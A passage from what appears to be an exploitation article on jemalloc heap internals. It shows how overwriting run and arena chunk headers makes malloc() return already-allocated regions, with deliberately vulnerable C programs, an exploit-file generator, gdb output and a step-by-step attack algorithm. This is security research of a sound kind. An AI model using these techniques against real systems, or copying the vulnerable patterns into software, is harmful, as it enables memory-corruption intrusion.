On the other hand, during the allocation process, once the appropriate run
|
|
is located, its 'regs_mask[]' bit vector is examined in search of a free
|
|
region. Note that the search for a free region starts at
|
|
'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first
|
|
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
|
|
force 'malloc()' return an already allocated region.
|
|
|
|
In a heap overflow situation it is pretty common for the attacker to be
|
|
able to overflow a memory region which is not followed by other regions
|
|
(like the wilderness chunk in dlmalloc, but in jemalloc such regions are
|
|
not that special). In such a situation, the attacker will most likely be
|
|
able to overwrite the run header of the next run. Since runs hold memory
|
|
regions of equal size, the next page aligned address will either be a
|
|
normal page of the current run, or will contain the metadata (header) of
|
|
the next run which will hold regions of different size (larger or smaller,
|
|
it doesn't really matter). In the first case, overwriting adjacent regions
|
|
of the same run is possible and thus an attacker can use the techniques
|
|
that were previously discussed in 3.1. The latter case is the subject of
|
|
the following paragraphs.
|
|
|
|
People already familiar with heap exploitation, may recall that it is
|
|
pretty common for an attacker to control the last heap item (region in our
|
|
case) allocated, that is the most recently allocated region is the one
|
|
being overflown. Because of the importance of this situation, we believe
|
|
it is essential to have a look at how we can leverage it to gain control
|
|
of the target process.
|
|
|
|
Let's first have a look at how the in-memory model of a run looks like
|
|
(file test-run.c):
|
|
|
|
|
|
char *first;
|
|
|
|
first = (char *)malloc(16);
|
|
printf("first = %p\n", first);
|
|
memset(first, 'A', 16);
|
|
|
|
breakpoint();
|
|
|
|
free(first);
|
|
|
|
|
|
The test program is compiled and a debugging build of jemalloc is loaded
|
|
to be used with gdb.
|
|
|
|
|
|
~$ gcc -g -Wall test-run.c -o test-run
|
|
~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7
|
|
~$ gdb test-run
|
|
GNU gdb 6.1.1 [FreeBSD]
|
|
...
|
|
(gdb) run
|
|
...
|
|
first = 0x28201030
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main () at simple.c:14
|
|
14 free(first);
|
|
|
|
|
|
The call to malloc() returns the address 0x28201030 which belongs to the
|
|
run at 0x28201000.
|
|
|
|
|
|
(gdb) print *(arena_run_t *)0x28201000
|
|
$1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252,
|
|
regs_mask = {4294967294}}
|
|
(gdb) print *(arena_bin_t *)0x8049838
|
|
$2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096,
|
|
nregs = 253, regs_mask_nelms = 8, reg0_offset = 48}
|
|
|
|
|
|
Oki doki, run 0x28201000 services the requests for memory regions of size
|
|
16 as indicated by the 'reg_size' value of the bin pointer stored in the
|
|
run header (notice that run->bin->runcur == run).
|
|
|
|
Now let's proceed with studying a scenario that can lead to 'malloc()'
|
|
exploitation. For our example let's assume that the attacker controls
|
|
a memory region 'A' which is the last in its run.
|
|
|
|
|
|
[run #1 header][RR...RA][run #2 header][RR...]
|
|
|
|
|
|
In the simple diagram shown above, 'R' stands for a normal region which may
|
|
or may not be allocated while 'A' corresponds to the region that belongs to
|
|
the attacker, i.e. it is the one that will be overflown. 'A' does not
|
|
strictly need to be the last region of run #1. It can also be any region of
|
|
the run. Let's explore how from a region on run #1 we can reach the
|
|
metadata of run #2 (file test-runhdr.c, also see [2-6]):
|
|
|
|
|
|
unsigned char code[] = "\x61\x62\x63\x64";
|
|
|
|
one = malloc(0x10);
|
|
memset(one, 0x41, 0x10);
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
|
|
two = malloc(0x10);
|
|
memset(two, 0x42, 0x10);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
|
|
three = malloc(0x20);
|
|
memset(three, 0x43, 0x20);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
__asm__("int3");
|
|
|
|
printf("[+] corrupting the metadata of region three's run\n");
|
|
memcpy(two + 4032, code, 4);
|
|
|
|
__asm__("int3");
|
|
|
|
|
|
At the first breakpoint we can see that for size 16 the run is at
|
|
0xb7d01000 and for size 32 the run is at 0xb7d02000:
|
|
|
|
|
|
gdb $ r
|
|
[Thread debugging using libthread_db enabled]
|
|
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
|
|
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
|
|
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
|
|
gdb $ print arenas[0].bins[3].runcur
|
|
$5 = (arena_run_t *) 0xb7d01000
|
|
gdb $ print arenas[0].bins[4].runcur
|
|
$6 = (arena_run_t *) 0xb7d02000
|
|
|
|
|
|
The metadata of run 0xb7d02000 are:
|
|
|
|
|
|
gdb $ x/30x 0xb7d02000
|
|
0xb7d02000: 0xb7fd3134 0x00000000 0x0000007e 0xfffffffe
|
|
0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000
|
|
0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
After the memcpy() and at the second breakpoint:
|
|
|
|
|
|
gdb $ x/30x 0xb7d02000
|
|
0xb7d02000: 0x64636261 0x00000000 0x0000007e 0xfffffffe
|
|
0xb7d02010: 0xffffffff 0xffffffff 0x7fffffff 0x00000000
|
|
0xb7d02020: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02030: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7d02040: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that the run's metadata and specifically the address of the
|
|
'bin' element (see [2-3]) has been overwritten. One way or the other, the
|
|
attacker will be able to alter the contents of run #2's header, but once
|
|
this has happened, what's the potential of achieving code execution?
|
|
|
|
A careful reader would have already thought the obvious; one can overwrite
|
|
the 'bin' pointer to make it point to a fake bin structure of his own.
|
|
Well, this is not a good idea because of two reasons. First, the attacker
|
|
needs further control of the target process in order to successfully
|
|
construct a fake bin header somewhere in memory. Secondly, and most
|
|
importantly, as it has already been discussed, the 'bin' pointer of a
|
|
region's run header is dereferenced only during deallocation. A careful
|
|
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
|
|
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
|
|
attacker's point of view, the bin pointer is not that interesting
|
|
('reg0_offset' overwrite may cause further problems as well leading to
|
|
crashes and a forced interrupt of our exploit).
|
|
|
|
Our attack consists of the following steps. The attacker overflows
|
|
'A' and overwrites run #2's header. Then, upon the next malloc() of
|
|
a size equal to the size serviced by run #2, the user will get as a
|
|
result a pointer to a memory region of the previous run (run #1 in our
|
|
example). It is important to understand that in order for the attack to
|
|
work, the overflown run should serve regions that belong to any of the
|
|
available bins. Let's further examine our case (file vuln-run.c):
|
|
|
|
|
|
char *one, *two, *three, *four, *temp;
|
|
char offset[sizeof(size_t)];
|
|
int i;
|
|
|
|
if(argc < 2)
|
|
{
|
|
printf("%s <offset>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* User supplied value for 'regs_minelm'. */
|
|
*(size_t *)&offset[0] = (size_t)atol(argv[1]);
|
|
|
|
printf("Allocating a chunk of 16 bytes just for fun\n");
|
|
one = (char *)malloc(16);
|
|
printf("one = %p\n", one);
|
|
|
|
/* All those allocations will fall inside the same run. */
|
|
printf("Allocating first chunk of 32 bytes\n");
|
|
two = (char *)malloc(32);
|
|
printf("two = %p\n", two);
|
|
|
|
printf("Performing more 32 byte allocations\n");
|
|
for(i = 0; i < 10; i++)
|
|
{
|
|
temp = (char *)malloc(32);
|
|
printf("temp = %p\n", temp);
|
|
}
|
|
|
|
/* This will allocate a new run for size 64. */
|
|
printf("Setting up a run for the next size class\n");
|
|
three = (char *)malloc(64);
|
|
printf("three = %p\n", three);
|
|
|
|
/* Overwrite 'regs_minelm' of the next run. */
|
|
breakpoint();
|
|
memcpy(two + 4064 + 4, offset, 4);
|
|
breakpoint();
|
|
|
|
printf("Next chunk should point in the previous run\n");
|
|
four = (char *)malloc(64);
|
|
printf("four = %p\n", four);
|
|
|
|
|
|
vuln-run.c requires the user to supply a value to be written on
|
|
'regs_minelm' of the next run. To achieve reliable results we have to
|
|
somehow control the memory contents at 'regs_mask[regs_minelm]' as well.
|
|
By taking a closer look at the layout of 'arena_run_t', we can see that by
|
|
supplying the value -2 for 'regs_minelm', we can force
|
|
'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is,
|
|
'regs_minelm[-2] = -2' :)
|
|
|
|
Well, depending on the target application, other values may also be
|
|
applicable but -2 is a safe one that does not cause further problems in the
|
|
internals of jemalloc and avoids forced crashes.
|
|
|
|
From function 'arena_run_reg_alloc':
|
|
|
|
|
|
static inline void *
|
|
arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin)
|
|
{
|
|
void *ret;
|
|
unsigned i, mask, bit, regind;
|
|
|
|
...
|
|
|
|
i = run->regs_minelm;
|
|
mask = run->regs_mask[i]; /* [3-4] */
|
|
if (mask != 0) {
|
|
/* Usable allocation found. */
|
|
bit = ffs((int)mask) - 1; /* [3-5] */
|
|
|
|
regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */
|
|
...
|
|
ret = (void *)(((uintptr_t)run) + bin->reg0_offset
|
|
+ (bin->reg_size * regind)); /* [3-7] */
|
|
|
|
...
|
|
return (ret);
|
|
}
|
|
|
|
...
|
|
}
|
|
|
|
|
|
Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2.
|
|
On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which
|
|
happens to be the value of 'regs_minelm', that is -2. The binary
|
|
representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who
|
|
haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if
|
|
it wasn't fucking tiring so far, at [3-6], 'regind' is computed as
|
|
'((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths,
|
|
for 'reg_size' values belonging to small-medium sized regions, the formula
|
|
at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a
|
|
memory region 63 chunks backwards :)
|
|
|
|
Now it's time for some hands on practice:
|
|
|
|
|
|
~$ gdb ./vuln-run
|
|
GNU gdb 6.1.1 [FreeBSD]
|
|
...
|
|
(gdb) run -2
|
|
Starting program: vuln-run -2
|
|
Allocating a chunk of 16 bytes just for fun
|
|
one = 0x28202030
|
|
Allocating first chunk of 32 bytes
|
|
two = 0x28203020
|
|
Performing more 32 byte allocations
|
|
...
|
|
temp = 0x28203080
|
|
...
|
|
Setting up a run for the next size class
|
|
three = 0x28204040
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main (argc=Error accessing memory address 0x0: Bad address.
|
|
) at vuln-run.c:35
|
|
35 memcpy(two + 4064 + 4, offset, 4);
|
|
(gdb) c
|
|
Continuing.
|
|
|
|
Program received signal SIGTRAP, Trace/breakpoint trap.
|
|
main (argc=Error accessing memory address 0x0: Bad address.
|
|
) at vuln-run.c:38
|
|
38 printf("Next chunk should point in the previous run\n");
|
|
(gdb) c
|
|
Continuing.
|
|
Next chunk should point in the previous run
|
|
four = 0x28203080
|
|
|
|
Program exited normally.
|
|
(gdb) q
|
|
|
|
|
|
Notice how the memory region numbered 'four' (64 bytes) points exactly
|
|
where the chunk named 'temp' (32 bytes) starts. Voila :)
|
|
|
|
|
|
------[ 3.3.2 - Chunk (arena_chunk_t)
|
|
|
|
In the previous section we described the potential of achieving arbitrary
|
|
code execution by overwriting the run header metadata. Trying to cover
|
|
all the possibilities, we will now focus on what the attacker can do
|
|
once she is able to corrupt the chunk header of an arena. Although
|
|
the probability of directly affecting a nearby arena is low, a memory
|
|
leak or the indirect control of the heap layout by continuous bin-sized
|
|
allocations can render the technique described in this section a useful
|
|
tool in the attacker's hand.
|
|
|
|
Before continuing with our analysis, let's set the foundations of the
|
|
test case we will cover.
|
|
|
|
[[Arena #1 header][R...R][C...C]]
|
|
|
|
As we have already mentioned in the previous sections, new arena chunks
|
|
are created at will depending on whether the current arena is full
|
|
(that is, jemalloc is unable to find a non-full run to service the
|
|
current allocation) or whether the target application runs on multiple
|
|
threads. Thus a good way to force the initialization of a new arena chunk
|
|
is to continuously force the target application to perform allocations,
|
|
preferably bin-sized ones. In the figure above, letter 'R' indicates the
|
|
presence of memory regions that are already allocated while 'C' denotes
|
|
regions that may be free. By continuously requesting memory regions,
|
|
the available arena regions may be depleted forcing jemalloc to allocate
|
|
a new arena (what is, in fact, allocated is a new chunk called an arena
|
|
chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()').
|
|
|
|
The low level function responsible for allocating memory pages (called
|
|
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
|
|
possible for several distinct arenas (and any possible arena extensions)
|
|
to be physically adjacent. So, once the attacker requests a bunch of
|
|
new allocations, the memory layout may resemble the following figure.
|
|
|
|
[[Arena #1 header][R...R][C...C]][[Arena #2 header][...]]
|
|
|
|
It is now obvious that overflowing the last chunk of arena #1 will
|
|
result in the arena chunk header of arena #2 getting overwritten. It is
|
|
thus interesting to take a look at how one can take advantage of such
|
|
a situation.
|
|
|
|
The following code is one of those typical vulnerable-on-purpose programs
|
|
you usually come across in Phrack articles ;) The scenario we will be
|
|
analyzing in this section is the following: The attacker forces the
|
|
target application to allocate a new arena by controlling the heap
|
|
allocations. She then triggers the overflow in the last region of the
|
|
previous arena (the region that physically borders the new arena) thus
|
|
corrupting the chunk header metadata (see [2-5] on the diagram). When the
|
|
application calls 'free()' on any region of the newly allocated arena,
|
|
the jemalloc housekeeping information is altered. On the next call to
|
|
'malloc()', the allocator will return a region that points to already
|
|
allocated space of (preferably) the previous arena. Take your time
|
|
to carefully study the following snippet since it is essential for
|
|
understanding this attack (full code in vuln-chunk.c):
|
|
|
|
|
|
char *base1, *base2;
|
|
char *p1, *p2, *p3, *last, *first;
|
|
char buffer[1024];
|
|
int fd, l;
|
|
|
|
p1 = (char *)malloc(16);
|
|
base1 = (char *)CHUNK_ADDR2BASE(p1);
|
|
print_arena_chunk(base1);
|
|
|
|
/* [3-8] */
|
|
|
|
/* Simulate the fact that we somehow control heap allocations.
|
|
* This will consume the first chunk, and will force jemalloc
|
|
* to allocate a new chunk for this arena.
|
|
*/
|
|
last = NULL;
|
|
|
|
while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1)
|
|
last = first;
|
|
|
|
print_arena_chunk(base2);
|
|
|
|
/* [3-9] */
|
|
|
|
/* Allocate one more region right after the first region of the
|
|
* new chunk. This is done for demonstration purposes only.
|
|
*/
|
|
p2 = malloc(16);
|
|
|
|
/* This is how the chunks look like at this point:
|
|
*
|
|
* [HAAAA....L][HFPUUUU....U]
|
|
*
|
|
* H: Chunk header
|
|
* A: Allocated regions
|
|
* L: The chunk pointed to by 'last'
|
|
* F: The chunk pointed to by 'first'
|
|
* P: The chunk pointed to by 'p2'
|
|
* U: Unallocated space
|
|
*/
|
|
fprintf(stderr, "base1: %p vs. base2: %p (+%d)\n",
|
|
base1, base2, (ptrdiff_t)(base2 - base1));
|
|
|
|
fprintf(stderr, "p1: %p vs. p2: %p (+%d)\n",
|
|
p1, p2, (ptrdiff_t)(p2 - p1));
|
|
|
|
/* [3-10] */
|
|
|
|
if(argc > 1) {
|
|
if((fd = open(argv[1], O_RDONLY)) > 0) {
|
|
/* Read the contents of the given file. We assume this file
|
|
* contains the exploitation vector.
|
|
*/
|
|
memset(buffer, 0, sizeof(buffer));
|
|
l = read(fd, buffer, sizeof(buffer));
|
|
close(fd);
|
|
|
|
/* Copy data in the last chunk of the previous arena chunk. */
|
|
fprintf(stderr, "Read %d bytes\n", l);
|
|
memcpy(last, buffer, l);
|
|
}
|
|
}
|
|
|
|
/* [3-11] */
|
|
|
|
/* Trigger the bug by free()ing any chunk in the new arena. We
|
|
* can achieve the same results by deallocating 'first'.
|
|
*/
|
|
free(p2);
|
|
print_region(first, 16);
|
|
|
|
/* [3-12] */
|
|
|
|
/* Now 'p3' will point to an already allocated region (in this
|
|
* example, 'p3' will overwhelm 'first').
|
|
*/
|
|
p3 = malloc(4096);
|
|
|
|
/* [3-13] */
|
|
|
|
fprintf(stderr, "p3 = %p\n", p3);
|
|
memset(p3, 'A', 4096);
|
|
|
|
/* 'A's should appear in 'first' which was previously zeroed. */
|
|
print_region(first, 16);
|
|
return 0;
|
|
|
|
|
|
Before going further, the reader is advised to read the comments and the
|
|
code above very carefully. You can safely ignore 'print_arena_chunk()'
|
|
and 'print_region()', they are defined in the file lib.h found in the code
|
|
archive and are used for debugging purposes only. The snippet is actually
|
|
split in 6 parts which can be distinguished by their corresponding '[3-x]'
|
|
tags. Briefly, in part [3-8], the vulnerable program performs a number
|
|
of allocations in order to fill up the available space served by the
|
|
first arena. This emulates the fact that an attacker somehow controls
|
|
the order of allocations and deallocations on the target, a fair and
|
|
very common prerequisite. Additionally, the last call to 'malloc()'
|
|
(the one before the while loop breaks) forces jemalloc to allocate a new
|
|
arena chunk and return the first available memory region. Part [3-9],
|
|
performs one more allocation, one that will lie next to the first (that
|
|
is the second region of the new arena). This final allocation is there
|
|
for demonstration purposes only (check the comments for more details).
|
|
|
|
Part [3-10] is where the actual overflow takes place and part [3-11]
|
|
calls 'free()' on one of the regions of the newly allocated arena. Before
|
|
explaining the rest of the vulnerable code, let's see what's going on when
|
|
'free()' gets called on a memory region.
|
|
|
|
|
|
void
|
|
free(void *ptr)
|
|
{
|
|
...
|
|
if (ptr != NULL) {
|
|
...
|
|
idalloc(ptr);
|
|
}
|
|
}
|
|
|
|
static inline void
|
|
idalloc(void *ptr)
|
|
{
|
|
...
|
|
chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */
|
|
if (chunk != ptr)
|
|
arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */
|
|
else
|
|
huge_dalloc(ptr);
|
|
}
|
|
|
|
|
|
The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk
|
|
that the given memory region belongs to. In fact, what it does is just
|
|
a simple pointer trick to get the first address before 'ptr' that is
|
|
aligned to a multiple of a chunk size (1 or 2 MB by default, depending
|
|
on the jemalloc flavor used). If this chunk does not belong to a, so
|
|
called, huge allocation, then the allocator knows that it definitely
|
|
belongs to an arena. As previously stated, an arena chunk begins with
|
|
a special header, called 'arena_chunk_t', which, as expected, contains
|
|
a pointer to the arena that this chunk is part of.
|
|
|
|
Now recall that in part [3-10] of the vulnerable snippet presented
|
|
above, the attacker is able to overwrite the first few bytes of the next
|
|
arena chunk. Consequently, the 'chunk->arena' pointer that points to
|
|
the arena is under the attacker's control. From now on, the reader may
|
|
safely assume that all functions called by 'arena_dalloc()' at [3-15]
|
|
may receive an arbitrary value for the arena pointer:
|
|
|
|
|
|
static inline void
|
|
arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr)
|
|
{
|
|
size_t pageind;
|
|
arena_chunk_map_t *mapelm;
|
|
...
|
|
|
|
pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT);
|
|
mapelm = &chunk->map[pageind];
|
|
...
|
|
|
|
if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) {
|
|
/* Small allocation. */
|
|
malloc_spin_lock(&arena->lock);
|
|
arena_dalloc_small(arena, chunk, ptr, mapelm); /* [3-16] */
|
|
malloc_spin_unlock(&arena->lock);
|
|
}
|
|
else
|
|
arena_dalloc_large(arena, chunk, ptr); /* [3-17] */
|
|
}
|
|
|
|
|
|
Entering 'arena_dalloc()', one can see that the 'arena' pointer
|
|
is not used a lot, it's just passed to 'arena_dalloc_small()'
|
|
or 'arena_dalloc_large()' depending on the size class of the
|
|
memory region being deallocated. It is interesting to note that the
|
|
aforementioned size class is determined by inspecting 'mapelm->bits'
|
|
which, hopefully, is under the influence of the attacker. Following
|
|
the path taken by 'arena_dalloc_small()' results in many complications
|
|
that will most probably ruin our attack (hint for the interested
|
|
reader - pointer arithmetics performed by 'arena_run_reg_dalloc()'
|
|
are kinda dangerous). For this purpose, we choose to follow function
|
|
'arena_dalloc_large()':
|
|
|
|
|
|
static void
|
|
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
|
|
{
|
|
malloc_spin_lock(&arena->lock);
|
|
...
|
|
|
|
size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
|
|
PAGE_SHIFT; /* [3-18] */
|
|
size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */
|
|
|
|
...
|
|
arena_run_dalloc(arena, (arena_run_t *)ptr, true);
|
|
malloc_spin_unlock(&arena->lock);
|
|
}
|
|
|
|
|
|
There are two important things to notice in the snippet above. The first
|
|
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
|
|
to the start of the memory region to be free()'ed while 'chunk' is the
|
|
address of the corresponding arena chunk. For a chunk that starts at
|
|
e.g. 0x28200000, the first region to be given out to the user may start
|
|
at 0x28201030 mainly because of the overhead involving the metadata of
|
|
chunk, arena and run headers as well as their bitmaps. A careful reader
|
|
may notice that 0x28201030 is more than a page far from the start
|
|
of the chunk, so, 'pageind' is larger or equal to 1. It is for this
|
|
purpose that we are mostly interested in overwriting 'chunk->map[1]'
|
|
and not 'chunk->map[0]'. The second thing to catch our attention is
|
|
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
|
|
element of the overwritten bitmap. This size is later converted to the
|
|
number of pages comprising it, so, the attacker can directly affect the
|
|
number of pages to be marked as free. Let's see 'arena_run_dalloc':
|
|
|
|
|
|
static void
|
|
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
|
|
{
|
|
arena_chunk_t *chunk;
|
|
size_t size, run_ind, run_pages;
|
|
|
|
chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run);
|
|
run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk)
|
|
>> PAGE_SHIFT);
|
|
...
|
|
|
|
if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0)
|
|
size = chunk->map[run_ind].bits & ~PAGE_MASK;
|
|
else
|
|
...
|
|
run_pages = (size >> PAGE_SHIFT); /* [3-20] */
|
|
|
|
/* Mark pages as unallocated in the chunk map. */
|
|
if (dirty) {
|
|
size_t i;
|
|
|
|
for (i = 0; i < run_pages; i++) {
|
|
...
|
|
/* [3-21] */
|
|
chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY;
|
|
}
|
|
|
|
...
|
|
chunk->ndirty += run_pages;
|
|
arena->ndirty += run_pages;
|
|
}
|
|
else {
|
|
...
|
|
}
|
|
chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
|
|
PAGE_MASK);
|
|
chunk->map[run_ind+run_pages-1].bits = size |
|
|
(chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
|
|
|
|
|
|
/* Page coalescing code - Not relevant for _this_ example. */
|
|
...
|
|
|
|
/* Insert into runs_avail, now that coalescing is complete. */
|
|
/* [3-22] */
|
|
arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]);
|
|
|
|
...
|
|
}
|
|
|
|
|
|
Continuing with our analysis, one can see that at [3-20] the same
|
|
size that was calculated in 'arena_dalloc_large()' is now converted
|
|
to a number of pages and then all 'map[]' elements that correspond to
|
|
these pages are marked as dirty (notice that 'dirty' argument given
|
|
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
|
|
true). The rest of the 'arena_run_dalloc()' code, which is not shown
|
|
here, is responsible for forward and backward coalescing of dirty
|
|
pages. Although not directly relevant for our demonstration, it's
|
|
something that an attacker should keep in mind while developing a real
|
|
life reliable exploit.
|
|
|
|
Last but not least, it's interesting to note that, since the attacker
|
|
controls the 'arena' pointer, the map elements that correspond to the
|
|
freed pages are inserted in the given arena's red black tree. This can be
|
|
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
|
|
may think that since red-black trees are involved in jemalloc, she can
|
|
abuse their pointer arithmetics to achieve a '4bytes anywhere' write
|
|
primitive. We urge all interested readers to have a look at rb.h, the
|
|
file that contains the macro-based red black tree implementation used
|
|
by jemalloc (WARNING: don't try this while sober).
|
|
|
|
Summing up, our attack algorithm consists of the following steps:
|
|
|
|
1) Force the target application to perform a number of allocations until a
|
|
new arena is eventually allocated or until a neighboring arena is reached
|
|
(call it arena B). This is mostly meaningful for our demonstration codes,
|
|
since, in real life applications chances are that more than one chunks
|
|
and/or arenas will be already available during the exploitation process.
|
|
|
|
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
|
|
to an already existing arena. The address of the very first arena of
|
|
a process (call it arena A) is always fixed since it's declared as
|
|
static. This will prevent the allocator from accessing a bad address
|
|
and eventually segfaulting.
|
|
|
|
3) Force or let the target application free() any chunk that belongs to
|
|
arena B. We can deallocate any number of pages as long as they are marked
|
|
as allocated in the jemalloc metadata. Trying to free an unallocated page
|
|
will result in the red-black tree implementation of jemalloc entering
|
|
an endless loop or, rarely, segfaulting.
|
|
|
|
4) The next allocation to be served by arena B, will return a pointer
|
|
somewhere within the region that was erroneously free()'ed in step 3.
|
|
|
|
The exploit code for the vulnerable program presented in this section
|
|
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
|
|
the offsets of the metadata may vary for your platform. Given the address
|
|
of an existing arena (arena A of step 2), it creates a file that contains
|
|
the exploitation vector. This file should be passed as argument to the
|
|
vulnerable target (full code in file exploit-chunk.c):
|
|
|
|
|
|
char buffer[1024], *p;
|
|
int fd;
|
|
|
|
if(argc != 2) {
|
|
fprintf(stderr, "%s <arena>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
memset(buffer, 0, sizeof(buffer));
|
|
|
|
p = buffer;
|
|
strncpy(p, "1234567890123456", 16);
|
|
p += 16;
|
|
|
|
/* Arena address. */
|
|
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
|
|
p += sizeof(size_t);
|
|
|
|
/* Skip over rbtree metadata and 'chunk->map[0]'. */
|
|
strncpy(p,
|
|
"AAAA" "AAAA" "CCCC"
|
|
"AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32);
|
|
|
|
p += 32;
|
|
|
|
*(size_t *)p = 0x00001002;
|
|
/* ^ CHUNK_MAP_LARGE */
|
|
/* ^ Number of pages to free (1 is ok). */
|
|
p += sizeof(size_t);
|
|
|
|
fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700);
|
|
write(fd, buffer, (p - (char *)buffer));
|
|
close(fd);
|
|
return 0;
|
|
|
|
|
|
It is now time for some action. First, let's compile and run the vulnerable
|
|
code.
|
|
|
|
|
|
$ ./vuln-chunk
|
|
# Chunk 0x28200000 belongs to arena 0x8049d98
|
|
# Chunk 0x28300000 belongs to arena 0x8049d98
|
|
...
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
p3 = 0x28302000
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
|
|
|
|
The output is what one expects it to be. First, the vulnerable code forces
|
|
the allocator to initialize a new chunk (0x28300000) and then requests
|
|
a memory region which is given the address 0x28301030. The next call to
|
|
'malloc()' returns 0x28302000. So far so good. Let's feed our target
|
|
with the exploitation vector and see what happens.
|
|
|
|
$ ./exploit-chunk 0x8049d98
|
|
$ ./vuln-chunk exploit2.v
|
|
# Chunk 0x28200000 belongs to arena 0x8049d98
|
|
# Chunk 0x28300000 belongs to arena 0x8049d98
|
|
...
|
|
Read 56 bytes
|
|
# Region at 0x28301030
|
|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
|
p3 = 0x28301000
|
|
# Region at 0x28301030
|
|
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
|
|
|
|
As you can see the second call to 'malloc()' returns a new region
|
|
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
|
|
|
|
Okay, so you're now probably thinking if this technique is useful. Please
|
|
note that the demonstration code presented in the previous two sections
|
|
was carefully coded to prepare the heap in a way that is convenient for
|
|
the attacker. It is for this purpose that these attacks may seem obscure
|
|
at first. On the contrary, in real life applications, heap overflows in
|
|
jemalloc will result in one of the following three cases:
|
|
|
|
1) Overwrite of an adjacent memory region.
|
|
|
|
2) Overwrite of the run metadata (in case the overflown region is the
|
|
last in a run).
|
|
|
|
3) Overwrite of the arena chunk metadata (in case the overflown region
|
|
is the last in a chunk).
|
|
|
|
That said we believe we have covered most of the cases that an attacker
|
|
may encounter. Feel free to contact us if you think we have missed
|
|
something important.
|
|
|
|
|
|
------[ 3.3.3 - Thread caches (tcache_t)
|
|
|
|
As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other
|
|
magazine metadata are placed in normal memory regions. Assuming a 'mag_t'
|
|
along with its void pointer array has a total size of N, one can easily
|
|
acquire a memory region in the same run by calling 'malloc(N)'.
|
|
|
|
Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()'
|
|
returning arbitrary attacker controlled addresses. It's just a matter of
|
|
overwriting 'nrounds' and the contents of the void pointer array to
|
|
contain a stack address (or any other address of interest). A careful
|
|
reader of section 2.1.7 would have probably noticed that the same result
|
|
can be achieved by giving 'nrounds' a sufficiently large value in order to
|
|
pivot in the stack (or any user controlled memory region). This scenario is
|
|
pretty straightforward to exploit, so, we will have a look at the case of
|
|
overwriting a 'mag_rack_t' instead (it's not that sophisticated either).
|
|
|
|
Magazine racks are allocated by 'mag_rack_alloc()':
|
|
|
|
|
|
